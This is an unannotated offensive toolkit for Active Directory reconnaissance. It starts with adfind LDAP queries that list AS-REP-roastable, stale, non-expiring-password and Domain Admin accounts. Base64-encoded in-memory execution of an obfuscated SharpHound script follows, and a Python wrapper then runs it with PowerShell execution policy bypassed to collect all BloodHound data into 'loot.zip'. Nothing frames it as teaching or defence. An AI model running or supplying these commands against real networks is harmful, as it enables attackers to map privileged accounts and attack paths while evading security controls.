adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName
adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))" sAMAccountName
adfind -f "(&(objectcategory=user)(lastLogonTimestamp<=132000000000000000))" sAMAccountName lastLogonTimestamp
adfind -f "memberof=CN=Domain Admins,CN=Users,DC=domain,DC=com" sAMAccountName
adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=64))" sAMAccountName
adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=2))" sAMAccountName

$encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((Get-Content .\SharpHound_Obfuscated.ps1 -Raw)))
$encoded | Out-File .\enc.txt

$content = Get-Content .\enc.txt -Raw
$decoded = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($content))
Invoke-Expression $decoded



import subprocess
import base64

with open("SharpHound_Obfuscated_Base64.txt", "rb") as f:
    b64code = f.read()

ps_script = base64.b64decode(b64code).decode("utf-8")

full_script = ps_script + "\nInvoke-BloodHound -CollectionMethod All -ZipFileName loot.zip\n"

proc = subprocess.run(
    ["powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", "-"],
    input=full_script,
    text=True,
    capture_output=True
)

print("[STDOUT]")
print(proc.stdout)
print("[STDERR]")
print(proc.stderr)
